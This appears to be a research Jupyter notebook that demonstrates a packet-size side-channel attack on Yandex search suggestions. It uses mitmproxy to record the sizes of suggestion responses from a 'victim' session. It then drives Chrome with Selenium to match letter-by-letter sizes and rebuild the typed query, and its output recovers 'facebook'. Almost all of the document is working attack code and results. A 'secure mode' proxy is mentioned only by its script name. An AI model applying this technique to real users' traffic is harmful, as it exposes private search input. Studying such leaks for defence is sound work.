In [23]:
from bs4 import BeautifulSoup
from struct import *
import urllib.request
import warnings
warnings.filterwarnings('ignore')
import pandas as pd
import numpy as np
import ssl
import os
import sys
import time
import threading
import re
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.common.exceptions import TimeoutException
from subprocess import STDOUT, PIPE, Popen, check_output, check_call, call
import socket
import netifaces as ni
import string


global driver

# get local ip address
ni.ifaddresses('en0')
myip = ni.ifaddresses('en0')[2][0]['addr']

# get keyword dictionary 
K=list()
with open('keywords.txt','r') as f:
    for line in f:
        if len(line)>3:
            K.append(line[:-1])

def terminal(cmd):
    os.system(cmd)

    

def deleteContent(fName):
    with open(fName, "w") as f:
        f.write("");
   # time.sleep(2)

def readProxyDump(file):
    time.sleep(1)
    f=open(file,'r')
    dump=''.join([line for line in f])
    r=re.findall("yandex\.com:443/suggest-spok.+\s+response.+text/javascript;\scharset=UTF-8,\s+(\d+)b",dump)
    f.close()
    return list(map(int,r))    
    
def enterALetter(letter,inputElement):
    deleteContent('sadu123.txt')
    time.sleep(0.1)
    inputElement.send_keys(letter)
    time.sleep(0.1)
    T2=readProxyDump('sadu123.txt')
    time.sleep(0.1)
    return list(map(int,T2))
            
def enterAWord(wrd,inputElement):
   
    time.sleep(0.5)
    for c in wrd:
        inputElement.send_keys(c)
        time.sleep(0.3)
    time.sleep(0.5)
    deleteContent('sadu123.txt')    

def enterAllAlphabet(inputElement):
    deleteContent('sadu123.txt')
    alphabet=list(string.ascii_lowercase)+[' ']
    for c in alphabet:
        time.sleep(0.1)
        inputElement.send_keys(c)
        time.sleep(0.1)
        inputElement.send_keys(Keys.BACKSPACE)
        
    time.sleep(0.3)
    T2=readProxyDump('sadu123.txt')
    return list(map(int,T2))

def mitmproxy():
    cmd="""mitmdump -s 'dumpfile.py yandex\.com/suggest-spok)' """
    t=threading.Thread(target=terminal,args=([cmd]))
    t.start()
    #time.sleep(duration)
    time.sleep(1)
   # t.stop()
    return t

def mitmproxySecure():
    cmd="""mitmdump -s 'fixpackages.py (yandex\.com/suggest-images|yandex\.com/suggest-spok|yandex\.com/suggest-video)' """
    t=threading.Thread(target=terminal,args=([cmd]))
    t.start()
    #time.sleep(duration)
    time.sleep(1)
   # t.stop()
    return t



def clearSearch(inputElement):
    inputElement.clear()

def findMatches(aList,packSize): # find matched packages, return indices
    returnList=list()
    if (len(aList) != 27):
        print(len(aList))
        print((aList))
        raise ValueError('Your list size less than 27, func:findMatches')
    
    for i in range(0,len(aList)):
        #print(aList[i])
        if((packSize >= (aList[i]-2) and (packSize <= (aList[i]+3)))):
            returnList.append(i)
    return returnList

def openYandex():
    driver=webdriver.Chrome()
    driver.get("https://yandex.com")
    time.sleep(2)
    inputElement = driver.find_element_by_id("text")
    time.sleep(1)
    driver_inputelement=list()
    driver_inputelement.append(driver)
    driver_inputelement.append(inputElement)
    return driver_inputelement


In [24]:
myip

len(readProxyDump('sadu123.txt'))

54

In [17]:
deleteContent('sadu123.txt') ## IMPORTANT: IF I TYPE FAST SEQUENCE PROBLEM EXIST
call(['echo', 'Lets Do Some Fun'])

0

### Start Regular Proxy

In [25]:
tp=mitmproxy() # file name is specified inside dumpfile.py "sadu123.txt" for the time being
call(['echo', 'Proxy Starting in Normal Mode...'])
call(['echo', 'Configuring...'])
time.sleep(2)
deleteContent('sadu123.txt')
call(['echo', 'Proxy Ready...'])

0

### Start Secure Proxy

In [26]:
tp=mitmproxySecure() # file name is specified inside dumpfile.py "sadu123.txt" for the time being
call(['echo', 'Proxy Starting in Secure Mode...'])
call(['echo', 'Configuring...'])
time.sleep(2)
deleteContent('sadu123.txt')
call(['echo', 'Proxy Ready...'])


0

### Victim Types some input

In [18]:
T=readProxyDump('sadu123.txt') 
print(T)
deleteContent('sadu123.txt')

[763, 860, 860, 860, 860, 860, 860, 843]


### Open browser where packet size('A') == 759


In [19]:
# PACKAGE SIZES VARY ~2,3 BYTES
# 757, ... , 782 -> 757 AND 782 REALLY RARE CASES,
# OVERALL 759-2 TO 759 + 3 
# LUCKILY IF ONE LETTER CHANGES 1 BYTE, ALL OF THE OTHER LETTERS CHANGE 1 BYTE

# OPEN GOOGLE CHROME UP UNTIL A==759
deleteContent('sadu123.txt')
time.sleep(1)
driver_inputelement = []
sizeA=[]
while(1):
    driver_inputelement = openYandex()
    inputElement = driver_inputelement[1]
    sizeA=enterALetter('a', inputElement )
    driver=driver_inputelement[0]
    if( sizeA[0] != 759):
        print(sizeA)
        driver.close()
    else:
        inputElement.clear()
        inputElement.click()
        break  

inputElement= driver_inputelement[1]
call(['echo', 'Browser Ready'])
print('Browser Ready')

Browser Ready


### Start Deciphering Process

In [20]:
call(['echo', 'Deciphering Process Starting...'])
time.sleep(2)

tree=[]
topofTree={'char':'null', 'parent':-1, 'degree':0, 'flag':1} #flag shows if node is active or removed
# topofTree['parent']
tree.append(topofTree)
#tree[0]['parent']

userInput=T
userInputSize=len(userInput)
i = 0
alphabet=list(string.ascii_lowercase)+[' ']

#OPEN CHROME w8 for 3 sec
currentDegree=0
deleteContent('sadu123.txt')  #delete content of the log file

while(i<userInputSize):
    currentPackSize=userInput[i]
    inserted=0 # check if new node inserted or not to increment degree
    newNodesOfTree=[] #new Nodes to be inserted into the tree at the end of 26 letter type process
    #if first letter, directly type all letters, insert matches
    if( i==0 ):
        i = i + 1
        #inputElement = openYandex() 
        #deleteContent('sadu123.txt') #delete contents
        letterPackSizes = enterAllAlphabet(inputElement) #type 26 letter
        print('Letter Package Sizes',end=' ') 
        print(letterPackSizes)       
        
        #insert matches to the tree
        indices = findMatches(letterPackSizes,userInput[0])
        print('First letter options: ',end='')

        for x in range(0,len(indices)):
            print( alphabet[ indices[x] ],end=' ' )
            newNode = {'char':alphabet[indices[x]],'parent':0,'degree':1,'flag':1}
            tree.append(newNode)
            #print(alphabet[indices[x]])
        currentDegree += 1
        print('')
        continue
      
    # number of elements that have i degree
    rootNum=len([t for t in range(len(tree)) if tree[t]['degree']==currentDegree])

    for j in range (rootNum,0,-1):
        newNode=tree[len(tree)-j]
        #if(newNode['flag']==0) continue # if removed node no need to go on
        toBeTypedBefore=[]
        currentNode=newNode
        print('\nCurrentNode: ',end=' ')
        print(currentNode)
        
        while( currentNode['parent'] != -1 ):
            toBeTypedBefore.append(currentNode['char']) # bottom one inserted
            currentNode=tree[currentNode['parent']]
        currentNode=newNode
        toBeTypedBefore=toBeTypedBefore[::-1]
        print("toBeTypedBefore:" + ''.join(toBeTypedBefore))  #type reverse of toBeTypedBefore
        
        clearSearch(inputElement)  #clear search engine
        #time.sleep(10)
        enterAWord(toBeTypedBefore,inputElement)        #type toBeType
        deleteContent('sadu123.txt') #delete contents
        time.sleep(0.1)
        letterPackSizes=enterAllAlphabet(inputElement) #type 26 letter after that 
       # print("letterPackSizes" + repr(letterPackSizes) + "\n")
        letterPackSizesTemp = []
        
        for k in range (0,len(letterPackSizes),2): #remove repetitive package sizes
            letterPackSizesTemp.append(letterPackSizes[k])
        letterPackSizesDebug = letterPackSizes # this is for debug purposes
        letterPackSizes=letterPackSizesTemp
       # print('letterTempPackSizes' + repr(letterPackSizes) +'\n')

        indices=findMatches(letterPackSizes,userInput[i]) #find matches
        if(len(indices) == 0):
            print('Next letter does not exist')
        else:  
            print('next letter options:',end='')
            for x in range(0,len(indices)):
                print( alphabet[indices[x]],end=' ')
        print('')

        tempNode=[]
        
        if(len(indices)==0): #if there is no match kill that path
          # while( currentNode['parent'] != -1 ): #remove recursively
            tempNode=tree[currentNode['parent']]
            print(repr(currentNode) + '-> flag set to 0:')
            index=tree.index(currentNode) #find location of currentnode
            tree[index]['flag']=0
            currentNode=tempNode
        else :#else insert matches to that node
        
            print('Number of added letters: ' + repr(len(indices)))
            if(len(indices) == 26):
                print('SORRY ADMIN... NO MORE REDUCTION in this path ')
                continue
            else:  
                inserted=1
                for x in range(0,len(indices)):
                    newNode={'char':alphabet[indices[x]],'parent':tree.index(currentNode),'degree':(currentDegree+1),'flag':1}
                    newNodesOfTree.append(newNode)
                    #print("newNodesOfTree:")
                    #print(newNodesOfTree)
    
            
   
    if(inserted):
        currentDegree=currentDegree+1
    
    print('Number of Nodes:' + repr(len(newNodesOfTree)) +'\n')
    tree=tree+newNodesOfTree
    
    
    
    i=i+1 

call(['echo', 'Deciphering Process Done...'])

    
    

Letter Package Sizes [759, 770, 776, 768, 753, 763, 823, 770, 758, 782, 746, 765, 751, 798, 790, 759, 759, 757, 772, 768, 777, 781, 836, 756, 826, 752, 59]
First letter options: f l 

CurrentNode:  {'char': 'f', 'parent': 0, 'degree': 1, 'flag': 1}
toBeTypedBefore:f
next letter options:a 
Number of added letters: 1

CurrentNode:  {'char': 'l', 'parent': 0, 'degree': 1, 'flag': 1}
toBeTypedBefore:l
Next letter does not exist

{'char': 'l', 'parent': 0, 'degree': 1, 'flag': 1}-> flag set to 0:
Number of Nodes:1


CurrentNode:  {'char': 'a', 'parent': 1, 'degree': 2, 'flag': 1}
toBeTypedBefore:fa
next letter options:c 
Number of added letters: 1
Number of Nodes:1


CurrentNode:  {'char': 'c', 'parent': 3, 'degree': 3, 'flag': 1}
toBeTypedBefore:fac
next letter options:e 
Number of added letters: 1
Number of Nodes:1


CurrentNode:  {'char': 'e', 'parent': 4, 'degree': 4, 'flag': 1}
toBeTypedBefore:face
next letter options:b s 
Number of added letters: 2
Number of Nodes:2


CurrentNode:  {'

0

In [22]:
#letterPackSizes
#letterPackSizesDebug
#len(letterPackSizesDebug)

### Print Tree, Show possible inputs

In [21]:
tree


ix=[t for t in range(len(tree)) if tree[t]['flag']==0]
#print(ix)
   
   
for t in range(len(ix)):
    print('Path ' + repr(t))
    toBePrinted=[]
    node=(tree[ix[t]])
    while(node['parent'] != -1):
        #print(node)
        toBePrinted.append(node)
        node=tree[node['parent']]
    for k in range (len(toBePrinted),0,-1):
        print(toBePrinted[k-1])
#Final Paths

print('\nDeciphering...')
print('Victim typed...\n')

ix=[t for t in range(len(tree)) if tree[t]['degree']==(currentDegree)]

# find nodes which satisfy nodes.degree == currentdegree 
for t in range(len(ix)):
    print('Path ' + repr(t))
    toBePrinted=[]
    node=(tree[ix[t]])
    while(node['parent'] != -1):
        toBePrinted.append(node)
        node=tree[node['parent']]
    for k in range (len(toBePrinted),0,-1):
        print(toBePrinted[k-1])

#indices=findMatches(tree['flag'],lambda x:x==0)
#indices
#for i in range (0,degree):




Path 0
{'char': 'l', 'parent': 0, 'degree': 1, 'flag': 0}
Path 1
{'char': 'f', 'parent': 0, 'degree': 1, 'flag': 1}
{'char': 'a', 'parent': 1, 'degree': 2, 'flag': 1}
{'char': 'c', 'parent': 3, 'degree': 3, 'flag': 1}
{'char': 'e', 'parent': 4, 'degree': 4, 'flag': 1}
{'char': 's', 'parent': 5, 'degree': 5, 'flag': 0}

Deciphering...
Victim typed...

Path 0
{'char': 'f', 'parent': 0, 'degree': 1, 'flag': 1}
{'char': 'a', 'parent': 1, 'degree': 2, 'flag': 1}
{'char': 'c', 'parent': 3, 'degree': 3, 'flag': 1}
{'char': 'e', 'parent': 4, 'degree': 4, 'flag': 1}
{'char': 'b', 'parent': 5, 'degree': 5, 'flag': 1}
{'char': 'o', 'parent': 6, 'degree': 6, 'flag': 1}
{'char': 'o', 'parent': 8, 'degree': 7, 'flag': 1}
{'char': 'k', 'parent': 9, 'degree': 8, 'flag': 1}
